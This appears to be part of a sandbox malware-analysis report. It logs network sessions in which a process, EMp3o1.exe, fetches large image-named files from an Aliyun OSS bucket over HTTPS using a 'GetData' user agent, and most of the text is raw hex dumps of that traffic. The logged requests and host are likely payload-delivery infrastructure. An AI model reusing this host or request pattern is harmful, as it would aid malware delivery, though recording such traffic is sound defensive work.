                                              2025-01-05 09:12:21 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                              Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                              2025-01-05 09:12:21 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                              Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                              2025-01-05 09:12:21 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                              Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                              2025-01-05 09:12:21 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                              Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                              2025-01-05 09:12:21 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                              Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                              2025-01-05 09:12:21 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                              Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                              2025-01-05 09:12:21 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                              Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.662783118.178.60.94436032C:\Users\user\Documents\EMp3o1.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:12:23 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:23 UTC548INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:23 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 4859125
                                              Connection: close
                                              x-oss-request-id: 677A4CF7DF727131332F097C
                                              Accept-Ranges: bytes
                                              ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                              Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 9060732723227198118
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                              x-oss-server-time: 14
                                              2025-01-05 09:12:23 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                              Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                              2025-01-05 09:12:23 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                              Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                              2025-01-05 09:12:23 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                              Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                              2025-01-05 09:12:23 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                              Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                              2025-01-05 09:12:23 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                              Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                              2025-01-05 09:12:23 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                              Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                              2025-01-05 09:12:23 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                              Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                              2025-01-05 09:12:23 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                              Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                              2025-01-05 09:12:23 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                              Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                              2025-01-05 09:12:23 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                              Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.662784118.178.60.94436032C:\Users\user\Documents\EMp3o1.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:12:35 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:35 UTC547INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:35 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 5062442
                                              Connection: close
                                              x-oss-request-id: 677A4D03716A9C3036FB706C
                                              Accept-Ranges: bytes
                                              ETag: "70C21DA900796B279A09040B00953E40"
                                              Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 360383310743409046
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                              x-oss-server-time: 13
                                              2025-01-05 09:12:35 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
